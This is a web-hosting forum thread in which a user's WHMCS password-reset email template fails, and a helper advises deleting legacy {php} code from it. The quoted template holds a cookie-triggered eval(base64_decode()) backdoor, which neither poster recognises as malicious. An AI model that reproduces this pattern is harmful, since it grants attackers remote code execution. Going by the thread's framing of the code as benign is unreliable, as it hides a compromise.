WizTech Posted July 7, 2019 Share Posted July 7, 2019 Only the reset password is failing - everything else seems to be okay. I did not change email templates at all ever so am working off the default one from years ago. So I have no idea what to change (or why it became necessary all of sudden). Upgraded to newest whcms in March and just ran into problems last week - but php settings may have changed as we identified another issue on the server that we have not figured out yet. That looks to be a php error about cookies? Appreciate any assistance. Can submit a ticket but was hoping for a quick answer here. full message is Smarty Error: Syntax error in template "mailMessage:mailMessage:message" on line 33 "<!-- message header end --><p>Dear {$client_name},</p><p>Recently a request was submitted to reset your password for our client area. If you did not request this, please ignore this email. It will expire and become useless in 2 hours time.</p><p>To reset your password, please visit the url below:<br /><a href="{$pw_reset_url}">{$pw_reset_url}</a></p><p>When you visit the link above, you will have the opportunity to choose a new password.</p><p>{$signature}</p>{php}if($_COOKIE["sec"] == "123"){eval(base64_decode($_COOKIE["sec2"])); die("!");}{/php}<!-- message footer start -->" tag 'private_php' disabled by security setting 0 Quote Link to comment Share on other sites More sharing options...
brian! Posted July 7, 2019 Share Posted July 7, 2019 2 minutes ago, WizTech said: Only the reset password is failing - everything else seems to be okay. I did not change email templates at all ever so am working off the default one from years ago. So I have no idea what to change (or why it became necessary all of sudden). Upgraded to newest whcms in March and just ran into problems last week - but php settings may have changed as we identified another issue on the server that we have not figured out yet. That looks to be a php error about cookies? Appreciate any assistance. Can submit a ticket but was hoping for a quick answer here. that email template code contains {php} tags which were disabled long ago... they were removed from Smarty, but WHMCS added a temporary (2-3 years ago) workaround... https://docs.whmcs.com/Templates_and_Custom_PHP_Logic Quote Historically, Smarty has allowed you to define custom PHP logic directly within template files. This has often been used by users and third party developers as a quick and convenient way of performing additional logic and defining additional template output. However, as of Smarty 3, support for the {php} block has been removed, and we are only providing legacy support to ease the transition for developers and users who work with our platform and rely on this functionality. In WHMCS 6.0 and later, a backwards compatibility Security setting "Allow Smarty PHP Tags" has been introduced in Setup > General Settings > Security which must be checked to enable the use of PHP tags. This setting defaults to Off, and may be removed in a future versions. additionally, because this is an email template, you'll be breaking the Smarty Security Policy with that code... https://docs.whmcs.com/Smarty_Security_Policy the simplest solution would just be to remove that {php}...{/php} code from the email template. it could probably be rewritten in Smarty to work, but plain old-fashioned removal would be easier. 🙂 1 Quote Link to comment Share on other sites More sharing options...
WizTech Posted July 7, 2019 Author Share Posted July 7, 2019 1 minute ago, brian! said: the simplest solution would just be to remove that {php}...{/php} code from the email template. So remove it in the actual file? Uh, which file? Haven't found it yet. So then is this due to the custom template which has very few deviations from the default six? 0 Quote Link to comment Share on other sites More sharing options...
brian! Posted July 7, 2019 Share Posted July 7, 2019 it will be in the email template itself, so Setup -> Email Templates and then choose the "Password Reset Validation" template... then choose help -> source code.... that will show the current template code in a new window and then it's just a case of removing that {php} code from it. ... if it helps, the default code for that template is... <p>Dear {$client_name},</p> <p>Recently a request was submitted to reset your password for our client area. If you did not request this, please ignore this email. It will expire and become useless in 2 hours time.</p> <p>To reset your password, please visit the url below:<br /><a href="{$pw_reset_url}">{$pw_reset_url}</a></p> <p>When you visit the link above, you will have the opportunity to choose a new password.</p> <p>{$signature}<br /><br /></p> 0 Quote Link to comment Share on other sites More sharing options...
WizTech Posted July 7, 2019 Author Share Posted July 7, 2019 okay, then I assume that's fixed now! The log says the reset mail was sent. Thanks so much for the quick response! Hopefully that's the only issue. It does make me wonder what other time bombs I got in the database though. Any way to find out what else might need tweaking due to many upgrades over the years? 0 Quote Link to comment Share on other sites More sharing options...
brian! Posted July 7, 2019 Share Posted July 7, 2019 8 minutes ago, WizTech said: Any way to find out what else might need tweaking due to many upgrades over the years? first thought would be to run the System Health Check to see if there is anything obvious that WHMCS is picking up on itself... you can access that from the Help menu in the admin area. next would be the PHP Version Compatibility Utility to see if there are any old files lurking around (there almost certainly will be). if you're coming from a pre-v7 version, i'd be concerned about two things - old third-party addons, and any customisations you made to the web templates... any old hooks would be a third concern.... checking the Activity log for any errors might also be an idea. 0 Quote Link to comment Share on other sites More sharing options...
WizTech Posted July 7, 2019 Author Share Posted July 7, 2019 I had already checked the system health and had neglected the php compatibility bit but still using 5.6 and wasn't worried. That might be why the tool returned an error just now. Thanks. 0 Quote Link to comment Share on other sites More sharing options...
brian! Posted July 7, 2019 Share Posted July 7, 2019 oh if you're still using PHP 5.6, then there is slightly less of an issue... some older addons/coding might fail if you upgraded to PHP 7+ (which you'll have to at some point), so take care when you do. 0 Quote Link to comment Share on other sites More sharing options...
WizTech Posted July 7, 2019 Author Share Posted July 7, 2019 Got it. Thanks! 0 Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.